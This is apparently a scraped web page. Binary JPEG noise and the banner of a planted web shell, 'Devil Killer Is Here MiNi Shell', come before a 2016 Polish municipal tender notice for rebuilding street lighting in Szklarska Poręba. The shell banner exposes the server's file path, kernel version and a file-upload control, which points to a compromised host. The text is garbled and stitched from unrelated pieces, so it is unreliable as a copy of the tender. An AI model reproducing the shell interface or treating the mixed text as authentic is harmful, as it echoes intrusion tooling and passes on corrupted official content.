JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160503/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160503/109848-N-2016.html

<p class="kh_header"><b>Szklarska Poręba: PRZEBUDOWA OŚWIETLENIA DROGOWEGO W SZKLARSKIEJ PORĘBIE 
 ULIC KILIŃSKIEGO,UROCZA ORAZ CARITAS - ETAP II</b><br>
<b>Numer ogłoszenia: 109848 - 2016; data zamieszczenia: 03.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 75 7547700, faks 75 7547724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szklarskaporeba.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA OŚWIETLENIA DROGOWEGO W SZKLARSKIEJ PORĘBIE 
 ULIC KILIŃSKIEGO,UROCZA ORAZ CARITAS - ETAP II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przebudowa ( skablowanie) oświetlenia drogowego w Szklarskiej Porębie      w obrębie ul. Kilińskiego, Uroczej i Caritas - Etap II.

1.1 Stan istniejący:
Istniejąca linia napowietrzna oświetlenia drogowego w miejscowości Szklarska Poręba, wykonana
jest przewodami typu AL i ASXS na słupach ŻN, E, i kratowych.
Charakterystyka stanu istniejącego:
- rodzaj sieci: napowietrzna nN,
- typy istniejących przewodów: AL ,ASXS,
- typy słupowa: ŻN, kratowe, E.
      


      1.2 Projektowane zagospodarowanie terenu
Wzdłuż ul. Urocza zbudowane zostaną słupy wraz z oprawami oświetleniowymi. Zasilanie projektowanych latarni oświetleniowych przewidziane jest kablem YAKXS 4x35. Linia oświetleniowa wykonana  w  Etapie I. zostanie połączona z projektowaną linią oświetleniową Etapu II. 
Jako dodatkowy środek ochrony przed porażeniem w sieci nN  zaprojektowano  samoczynne wyłączenie
zasilania, natomiast  wzdłuż trasy projektowanej linii kablowej oświetlenia drogowego ułożona zostanie
bednarka 25x4 i  połączona z szynami PEN w latarniach. 
Do demontażu przewidziana jest  istniejąca, napowietrzna  linia oświetleniowa typu AL, ASXS na działce oznacz. geodezyjnie  jako  790/3- obręb 0006 Szklarska Poręba, JE Szklarska Poręba wraz z oprawami, osprzętem oraz wyłącznie  słupami oświetleniowymi. 
Na ww. działce realizowany jest również element przedmiotu zamówienia-  budowa projektowanej linii kablowej oświetlenia drogowego. 

      1.3 Ogólnie - zakres rzeczowy przedmiotu zamówienia:
- budowa linii kablowej oświetlenia drogowego - łączna długość  kabli około 784mb
- budowa latarni oświetlenia drogowego - łączna ilość latarni - 19 sztuk
- demontaż linii napowietrznej oświetlenia drogowego typu AL i ASXS - na działce oznacz. geodez. jako 790/3 
- demontaż opraw oświetleniowych - około 15 sztuk
- demontaż słupów oświetleniowych - około 13 sztuk.


2. Powyższy zakres ma charakter poglądowy. Szczegółowy opis przedmiotu zamówienia  zawarty jest w Rozdziale   III. Specyfikacji Istotnych Warunków Zamówienia  pn.  Opis przedmiotu zamówienia,  ogólnie zwanym Dokumentacją projektową - pliki oznaczone jako [3] i [4].

3.	Pochodzące z demontażu istniejącego oświetlenia kable, oprawy, słupy, osprzęt stanowią materiał Zamawiającego, który  podlega przewiezieniu przez Wykonawcę i zdeponowaniu, za pisemnym poświadczeniem ilościowego odbioru,  na terenie bazy  Miejskiego Zakładu  Gospodarki Lokalowej                    w Szklarskiej Porębie przy ul. Turystycznej 2. 

4.	Teren  przeznaczony pod inwestycję 

      - obejmuje drogi gminne.
      - uzbrojenie terenu w pobliżu planowanej inwestycji to sieć energetyczna nN, sieć teletechniczna, sieć  
        wodno- kanalizacyjna.
  - posiada na część , która nie jest objęta planem zagospodarowania przestrzennego Miasta Szklarskiej Poręby   
         Decyzję o ustaleniu lokalizacji inwestycji celu publicznego nr 17/2014 z dnia 27.11.2014r.
  - podlega  ochronie konserwatorskiej na podstawie przepisów ustawy  z dnia 23.07.2003r. o ochronie zabytków i opiece nad zabytkami - Miasto Szklarska Poręba zostało wpisane do rejestru zabytków pod nr 611/J z dnia 26.02.1980r.

5.	Na realizację przedmiotu zamówienia Zamawiający posiada Decyzję 1536/2015- pozwolenie na podejmowanie innych działań przy zabytku oraz Decyzję nr 20/2016 zatwierdzającą projekt budowlany             i udzielającą  pozwolenie na budowę 6.Wymagany okres gwarancji jakości i rękojmi za wady  dla całego przedmiotu zamówienia  - minimum 60 miesięcy.
          Bieg okresu gwarancji rozpoczyna się wraz z dniem podpisania protokołu odbioru końcowego przedmiotu zamówienia, w którym nie stwierdza się  występowania wad lub wraz z dniem podpisania protokołu odbioru usunięcia wad i usterek stwierdzonych w protokole odbioru końcowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 31.52.00.00-5, 31.52.72.10-1, 31.52.72.60-6, 45.31.43.10-7, 45.31.61.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 75.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości  4 000  PLN         (słownie złotych:  cztery tysiące).

Wadium może być wniesione w następujących formach:
 pieniądzu,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że    poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych, gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275,  z późniejszymi zmianami).W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona   zgodnie z obowiązującym prawem i winna zawierać następujące elementy: nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego tj. Miasto Szklarska 
         Poręba ),  gwaranta ( banku lub instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich  siedzib;
 określenie wierzytelności, która ma być zabezpieczona gwarancją;
 kwotę gwarancji,; gwarancji; żądanie Zamawiającego zawierające oświadczenie:  że  wykonawca,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 upzp. z przyczyn leżących po jego stronie , nie złożył  dokumentów lub oświadczeń, o których mowa w art.25.ust.1 upzp. ,pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art.24 ust.2 pkt 5) lub informacji, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art.87 ust.2 pkt3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej  lub że wykonawca ,  którego ofertę wybrano:
         odmówił podpisania umowy na warunkach określonych w ofercie        lub nie wniósł zabezpieczenia należytego wykonania umowy                        lub
           zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
     Postanowienia pkt  3. stosuje się również do poręczeń, określonych w pkt 2.b) i 2.e).
 Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem na rachunek Zamawiającego,  otwarty  w  PLN : Bank Zachodni WBK S.A. 1 Oddział  w Szklarskiej Porębie -  nr 68 1090 1984 0000 0001 0081 6338 
     z adnotacją w tytule wpłaty :  Wadium - oświetlenie_ Etap II_ V 2016. Wadium wnoszone w innej, niż  pieniądz  dopuszczonej przez Zamawiającego formie _formach wykonawca wnosi do Zamawiającego  przy czym,  w takim przypadku za termin doręczenia uważa się datę jego zdeponowania u  Kierownika Referatu Inwestycji Miejskich i Gospodarki Komunalnej -  budynek  Urzędu Miasta Szklarska Poręba - II piętro  lub  innej, wskazanej  osoby w ww. Referacie, w godzinach od 07:30 do 15:00 od poniedziałku do piątku, z wyłączeniem sobót i dni ustawowo wolnych od pracy. Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie/formach wykonawca może  również dołączyć do oferty.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego, Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym  warunkiem do stwierdzenia terminowego wniesienia wadium przez wykonawcę. 
 W przypadku, kiedy wnoszone wadium  w postaci gwarancji bankowych bądź ubezpieczeniowych  dotyczy zabezpieczenia oferty składanej  przez wykonawców ubiegających się wspólnie o udzielenie zamówienia -             w treści  gwarancji bankowych bądź ubezpieczeniowych  muszą znajdować się wszystkie podmioty (konsorcjanci) wymienieni jako wykonawcy.
 Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 upzp.
 Zamawiający  zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  Wykonawca w  odpowiedzi  na wezwanie,                o którym  mowa w art.26 ust.3 upzp., z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 upzp., pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art.24 ust.2 pkt 5), lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art.87 ust.2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.     Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;  
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
               Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykonawcę stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia w szczególności osoby odpowiedzialne za kierowanie robotami budowlanymi, tj.
(a)   Kierownika Budowy   posiadającego :
-  uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów,
- co najmniej 24-miesięczny staż pracy na stanowisku kierownika budowy przy robotach budowlanych  zgodnych z kierunkiem wymaganych uprawnień,
                    - co najmniej osiemnastomiesięczne(18) doświadczenie nabyte podczas udziału w robotach budowlan.       
                     przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucja kultury;

            (b) niezbędna ilość osób konieczną do wykonania przedmiotu zamówienia, z co najmniej jedną osobą  posiadającą aktualne  świadectwa  kwalifikacyjne do wykonywania pracy na stanowiskach dozoru                    i eksploatacji w zakresie minimum: montażu i prac kontrolno - pomiarowych w grupie urządzeń, instalacji i sieci elektroenergetycznych wytwarzającej, przetwarzającej, przesyłającej i zużywającej energię elektryczną o napięciu nie wyższym niż 1 kV  lub dwoma osobami posiadającymi oddzielnie ww. kwalifikacje
             
              Przez pojęcie: 
              minimalny okres  doświadczenia zawodowego  należy rozumieć łączną ilość przepracowanych miesięcy, liczonych od daty uzyskania uprawnień budowlanych do daty ukazania się Ogłoszenia o zamówieniu       w Biuletynie Zamówień Publicznych. 


Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.

Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie        i wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osób odpowiedzialnych za kierowanie robotami budowlanymi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
a)	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi  i zdolnością kredytową)  - w wysokości co najmniej  100 000  PLN;

b)	że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej               z przedmiotem zamówienia na kwotę minimum  200 000 PLN,

                 oraz złoży stosowne oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
(a)	pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, wg wzoru stanowiącego załącznik nr 6;
(b)	Informację banku  lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającą  wysokość posiadanych środków finansowych lub zdolność kredytową  tego podmiotu , wystawioną nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert - jeżeli udostępnia zasoby,                 o których mowa w punkcie VIII.1.3. a).
 Zobowiązanie osoby fizycznej prowadzącej działalność gospodarczą we własnym imieniu zawierające nie stanowi zobowiązania_innego podmiotu_ w rozumieniu art. 26 ust. 2b upzp. (por. wyrok KIO z 14 października 2011 r., sygn. akt KIO 2106/11). Bezpośrednie dysponowanie osobami na podstawie umów cywilnoprawnych przez wykonawcę także nie jest sytuacją,  o której mowa w art. 26 ust. 2b upzp. (wyrok KIO z 28 czerwca 2010 r., sygn. akt KIO 1104/10)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Skrócenie cyklu realizacji o minimum 14 dni (włącznie) tj. z cyklem realizacji  maksymalnie 61 dni (włącznie) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

1.1   zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na    osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Cz. I IDW,

1.2    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy lub dalszych podwykonawców ,  

1.3  rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia   okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz z jednoczesnym  związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony przed podpisaniem umowy  kosztorys ofertowy, 

   1.4  wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w  trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany                         w Dokumentacji projektowej, nie powodujących zmiany umownej ceny, 

